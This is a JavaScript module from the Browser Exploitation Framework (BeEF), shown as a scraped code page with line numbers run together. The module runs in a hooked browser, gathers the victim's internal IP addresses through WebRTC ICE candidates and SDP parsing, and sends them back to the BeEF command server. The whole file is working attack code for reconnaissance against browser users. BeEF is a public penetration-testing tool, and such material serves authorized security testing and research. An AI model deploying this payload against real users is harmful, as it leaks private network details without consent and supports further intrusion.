Path: blob/master/modules/host/get_internal_ip_webrtc/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;910if (window.RTCIceGatherer || RTCPeerConnection){1112var addrs = Object.create(null);13addrs["0.0.0.0"] = false;1415// Prefer RTCIceGatherer of simplicity.16if (window.RTCIceGatherer) {17var iceGatherer = new RTCIceGatherer({18"gatherPolicy": "all",19"iceServers": [ ],20});21iceGatherer.onlocalcandidate = function (evt) {22if (evt.candidate.type) {23// There may be multiple IP addresses24if (evt.candidate.type == "host") {25// The ones marked "host" are local IP addresses26processIPs(evt.candidate.ip);27};28} else {29retResults();30};31};32iceGatherer.onerror = function (e) {33beef.debug("ICE Gatherer Failed");34beef.net.send('<%= @command_url %>', <%= @command_id %>, "ICE Gatherer Failed", beef.are.status_error());35};36} else {37// Construct RTC peer connection38var servers = {iceServers:[]};39var mediaConstraints = {optional:[{googIPv6: true}]};40var rtc = new RTCPeerConnection(servers, mediaConstraints);41rtc.createDataChannel('', {reliable:false});4243// Upon an ICE candidate being found44// Grep the SDP data for IP address data45rtc.onicecandidate = function (evt) {46if (evt.candidate){47// There may be multiple local IP addresses48beef.debug("a="+evt.candidate.candidate);49grepSDP("a="+evt.candidate.candidate);50} else {51// No more candidates: return results.52retResults();53};54};5556// Create an SDP offer57rtc.createOffer(function (offerDesc) {58grepSDP(offerDesc.sdp);59rtc.setLocalDescription(offerDesc);60retResults();61}, function (e) {62beef.debug("SDP Offer Failed");63beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed", beef.are.status_error());64});65};6667function retResults(){68var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });6970// This is for the ARE, as this module is async, so we can't just return as we would in a normal sync way71get_internal_ip_webrtc_mod_output = [beef.are.status_success(), displayAddrs.join(",")];72}7374// Return results75function processIPs(newAddr) {76if (newAddr in addrs) return;77else addrs[newAddr] = true;78var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });79beef.debug("Found IPs: "+ displayAddrs.join(","));80beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","), beef.are.status_success());81}828384// Retrieve IP addresses from SDP85function grepSDP(sdp) {86var hosts = [];87sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-3988if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.1389var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.190addr = parts[4],91type = parts[7];92if (type === 'host') processIPs(addr);93} else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.794var parts = line.split(' '),95addr = parts[2];96processIPs(addr);97}98});99}100}else {101beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection", beef.are.status_error());102}103});104105106